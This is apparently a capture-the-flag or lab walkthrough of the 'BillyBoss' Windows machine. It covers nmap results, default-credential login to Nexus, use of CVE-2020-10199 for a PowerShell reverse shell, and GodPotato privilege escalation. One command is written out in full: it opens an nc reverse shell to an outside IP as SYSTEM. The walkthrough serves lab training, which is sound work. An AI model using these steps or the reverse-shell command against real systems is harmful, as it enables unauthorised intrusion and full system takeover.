BILLYBOSS

• 1-Nmap

• 2-Port 8081

• 3-Log in

• 4-Revshell

• 5-Exploit

• 6-Privilege Escalation

1-Nmap

PORT     STATE SERVICE VERSION
21/tcp   open  ftp     Microsoft ftpd
| ftp-syst:
|_  SYST: Windows_NT
80/tcp   open  http    Microsoft IIS httpd 10.0
|_http-cors: HEAD GET POST PUT DELETE TRACE OPTIONS CONNECT PATCH
|_http-server-header: Microsoft-IIS/10.0
|_http-title: BaGet
8081/tcp open  http    Jetty 9.4.18.v20190429
| http-robots.txt: 2 disallowed entries
|_/repository/ /service/
|_http-server-header: Nexus/3.21.0-05 (OSS)
|_http-title: Nexus Repository Manager
| http-enum:
|_  /robots.txt: Robots file
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

2-Port 8081

There are two web pages, one on port 80 and the other on port 8081. On port 80 we found nothing that caught our attention, so we went to port 8081 and found a Sonatype Nexus Repository Manager dashboard:

Sonatype Nexus Dashboard

3-Log in

Looking for information we found that this version of Nexus is vulnerable to RCE CVE: 2020-10199, but you have to be authenticated, so looking in the documentation we found that the default credentials are either admin/admin123 , nexus/nexus123 or nexus/nexus, after trying all three the only one that works is the last one:

Log in as nexus

4-Revshell

We can now execute commands with the exploit CVE: 2020-10199`, we are going to execute a reverse shell directly, we will use the rev shell web page (https://www.revshells.com/) to generate a base64 PowerShell:

Generate a reverse shell

5-Exploit

Next, modify the exploit to change the target ip and the payload:

Modify the exploit

Execute the exploit:

Run the exploit

And listening at the same time with nc on port 443 we get the reverse shell as nathan:

Get the reverse shell as nathan

6-Privilege Escalation

After a long enumeration, I googled the Windows build number and found this Windows 10 version history on Wikipedia. Windows 10 build 18362 translates to version 1903. The user we are running with nathan has SeImpersonatePrivilege enabled, which would make him the perfect candidate for a Potato attack. There is a recent Potato privilege escalation exploit that works on newer versions of Windows. So you have to transfer the exploit to the victim machine and then run a reverse shell. (https://github.com/BeichenDream/GodPotato)

PS C:\Users\nathan> .\godp.exe -cmd "cmd /c C:\Users\nathan\nc.exe 192.168.45.177 443 -e cmd.exe"

Reverse Shell with GodPotato

As we can see, a new process is created with the user NT AUTHORITY SYSTEM, and we get the shell: